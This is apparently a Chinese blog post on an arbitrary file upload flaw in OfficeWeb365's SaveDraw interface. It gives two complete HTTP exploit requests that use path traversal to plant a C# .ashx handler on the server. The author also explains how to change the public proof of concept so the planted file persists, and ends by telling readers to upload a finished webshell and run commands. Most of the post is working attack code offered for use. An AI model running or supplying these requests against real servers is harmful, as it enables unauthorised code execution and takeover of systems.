OfficeWeb365 SaveDraw 任意文件上传漏洞

OfficeWeb365 的 SaveDraw 接口存在文件上传漏洞,允许攻击者上传任意文件并执行恶意代码,从而获取服务器权限。这一漏洞影响版本包括 v8.6.1.0 和 v7.18.23.0。

漏洞利用示例

攻击者通过以下 HTTP 请求上传恶意文件:

POST /PW/SaveDraw?path=../../Content/img&idx=10.ashx HTTP/1.1

Host: xx.xx.xx.xx:8088

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

Content-Type: application/x-www-form-urlencoded

data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler

{

public void ProcessRequest(System.Web.HttpContext context)

{

System.Web.HttpResponse response = context.Response;

response.Write(44 * 41);

string filePath = context.Server.MapPath("/") + context.Request.Path;

if (System.IO.File.Exists(filePath))

{

System.IO.File.Delete(filePath);

}

}

public bool IsReusable

{

get { return false; }

}

}///---

成功后,攻击者可通过访问 http://target.com/Content/img/UserDraw/drawPW10.ashx 执行上传的恶意代码。

但是这个代码是一次性的 访问后就会删除 因为网上的POC有System.IO.File.Delete(filePath);

所以再真的利用的poc要用

GET /PW/SaveDraw?path=../../Content/img&idx=bddalnpl.ashx HTTP/1.1

Host: target

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Content-Length: 511

data:image/png;base64,30087ab5b1cd6d7d34d7f22f53819448<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler

{

public void ProcessRequest(System.Web.HttpContext context)

{

System.Web.HttpResponse response = context.Response;

response.Write("Webshell");

string filePath = context.Server.MapPath("/") + context.Request.Path;

if (System.IO.File.Exists(filePath))

{

System.IO.File.Delete(filePath);

}

}

public bool IsReusable

{

get { return false; }

}

}///---

这个POC就长久化了。最后上传成品并执行命令

相关推荐
迪康软件zz33 分钟前
终端审批体系怎么搭?从模板配置到业务连续性
运维·安全·自动化运维
Hum8le44 分钟前
CTF题目《easy_web》(安洵杯 2019 变种 Web)
前端·安全·web安全
HackTwoHub1 小时前
DeepSeek Harness 红队破甲插件|适配 SRC 挖掘场景,区分平台拦截与模型原生输出,用于大模型安全边界合规测评研究
安全·web安全·网络安全·系统安全·密码学·网络攻击模型·安全架构
梦帮科技1 小时前
【3.0】上线与运维:节点监控、水龙头、区块浏览器与安全清单
运维·安全·web安全·金融·区块链·密码学·安全架构
花 满 楼2 小时前
HSM自学之路——阶段5安全启动专题与实践
安全·嵌入式·汽车电子·hsm·安全启动
三8443 小时前
Fastjson 漏洞· 06 · 防御、审计与检测
安全·web安全·fastjson
qetfw3 小时前
Debian SSH 安全配置:端口、来源限制与免密登录
linux·安全·debian·ssh
砚凝霜4 小时前
【软考信息安全】第十二章 网络安全审计概述与分类
网络·安全·web安全
大鹏的NLP博客4 小时前
Rust 的本质:用数学约束实现编译期内存安全
安全·rust
迪康妍妍4 小时前
终端安全实战:用迪康终端安全管理系统实现U盘四分档管控与全量审计
android·运维·网络·安全·电脑